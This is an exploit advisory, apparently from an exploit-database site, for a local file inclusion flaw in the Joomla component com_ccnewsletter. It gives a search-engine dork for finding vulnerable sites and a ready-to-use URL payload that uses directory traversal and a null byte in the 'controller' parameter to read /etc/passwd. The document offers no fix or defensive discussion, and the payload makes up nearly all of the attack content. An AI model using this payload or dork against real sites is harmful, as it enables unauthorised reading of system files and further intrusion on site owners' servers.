[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component com_ccnewsletter LFI Vulnerability
# Published : 2010-01-28
# Author : AtT4CKxT3rR0r1ST
# Previous Title : Joomla Component jVideoDirect Blind SQL Injection Vulnerability
# Next Title : Joomla VirtueMart Module (Customers_who_bought...) SQL Injection Vulnerability


Joomla Component com_ccnewsletter Local File Inclusion
==========================================================

###########################################
.:. Author         : AtT4CKxT3rR0r1ST

.:. Email          : F.Hack@w.cn

.:. Home           : www.sec-attack.com/vb

.:. Script         : Joomla Component com_ccnewsletter

.:. Bug Type       : Local File Inclusion [LFI]

.:. Dork           : inurl:"com_ccnewsletter"

.:. Date           : 28/1/2010

#############################################

===[ Exploit ]===

http://server/index.php?option=com_ccnewsletter&controller=[LFI]

http://server/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00


#############################################

Greats T0: My Mind & All member Sec Attack